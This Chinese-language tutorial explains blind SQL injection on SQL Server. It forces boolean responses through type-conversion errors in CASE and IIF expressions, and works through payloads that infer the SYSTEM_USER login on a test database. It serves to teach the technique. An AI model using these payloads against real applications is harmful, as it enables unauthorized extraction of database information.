0x01 前言

在注入的时候,你可能会遇到一种情况,那就是某个地方有注入

但是表里没有数据,导致你无法正常的进行布尔注入

那么所以此方法你就可以获得跟 mysql语句 case when 1 like 1 then 0 else 2*1e308 end 类似的效果

这里使用的方法是 两者数据类型不一致然后又进行比对时,导致发生错误,这样来强制显示出布尔的效果

0x02 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title       | content    |
  5. +----+-----------+-----------+
  6. |  1 | 测试标题  | 测试内容  |
  7. |  2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  3. sql server> select * from users;
  4. +----+--------------+----------+
  5. | id | username     | password |
  6. +----+--------------+----------+
  7. |  1 | test-user-01 |  123456  | 
  8. |  2 | test-user-02 |  234567  |
  9. +----+--------------+----------+
  10. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1                |
  4. +-----------------------+
  5. | sa                    |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1                |
  4. +-----------------------+
  5. | test                  |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x03 CASE 条件语句 例子一

SQL:select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE ‘x’ END)

  1. # 对的情况
  2. 1> select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);
  3. 2> go
  4. +----+----------+----------+
  5. | id | title      | content   |
  6. +----+----------+----------+
  7. |  1 | 测试标题 | 测试内容 |
  8. +----+----------+----------+
  9. (1 rows affected)

SQL:select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE ‘x’ END);

  1. # 错误的情况
  2. 1> select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);
  3. 2> go
  4. 22018 - [SQL Server]在将 varchar  'x' 转换成数据类型 int 时失败。

这样就可以达到强制布尔的结果了

0x04 CASE 条件语句 例子二

SQL:select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘%sa%’ THEN 1 ELSE ‘x’ END)

  1. # 查询SYSTEM_USER 正确的情况
  2. 1> SELECT
  3.     *
  4. FROM
  5.     article
  6. WHERE
  7.     id = 1
  8. AND 1 = (
  9.     CASE
  10.     WHEN SYSTEM_USER LIKE '%sa%' THEN
  11.         1
  12.     ELSE
  13.         'x'
  14.     END
  15. );
  16. 2> go
  17. +----+----------+----------+
  18. | id | title      | content   |
  19. +----+----------+----------+
  20. |  1 | 测试标题 | 测试内容 |
  21. +----+----------+----------+
  22. (1 rows affected)

SQL:select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘%aaaaa%’ THEN 1 ELSE ‘x’ END)

  1. # 查询SYSTEM_USER 错误的情况
  2. 1> SELECT
  3.     *
  4. FROM
  5.     article
  6. WHERE
  7.     id = 1
  8. AND 1 = (
  9.     CASE
  10.     WHEN SYSTEM_USER LIKE '%aaaaa%' THEN
  11.         1
  12.     ELSE
  13.         'x'
  14.     END
  15. );
  16. 2> go
  17. 22018 - [SQL Server]在将 varchar  'x' 转换成数据类型 int 时失败。

0x05 IIF 条件语句 例子一

SQL:select * from article WHERE id=1 and 1=IIF(1=1,1,’x’);

  1. # 对的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(1=1,1,'x');
  3. 2> go
  4. +----+----------+----------+
  5. | id | title      | content   |
  6. +----+----------+----------+
  7. |  1 | 测试标题 | 测试内容 |
  8. +----+----------+----------+
  9. (1 rows affected)

SQL:select * from article WHERE id=1 and 1=IIF(1=2,1,’x’);

  1. # 错误的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(1=2,1,'x');
  3. 2> go
  4. 22018 - [SQL Server]在将 varchar  'x' 转换成数据类型 int 时失败。

0x06 IIF 条件语句 例子二

  1. # 查询SYSTEM_USER 正确的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%sa%',1,'x');
  3. 2> go
  4. +----+----------+----------+
  5. | id | title      | content   |
  6. +----+----------+----------+
  7. |  1 | 测试标题 | 测试内容 |
  8. +----+----------+----------+
  9. (1 rows affected)
  1. # 查询SYSTEM_USER 错误的情况
  2. 1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%aaaa%',1,'x');
  3. 2> go
  4. 22018 - [SQL Server]在将 varchar  'x' 转换成数据类型 int 时失败。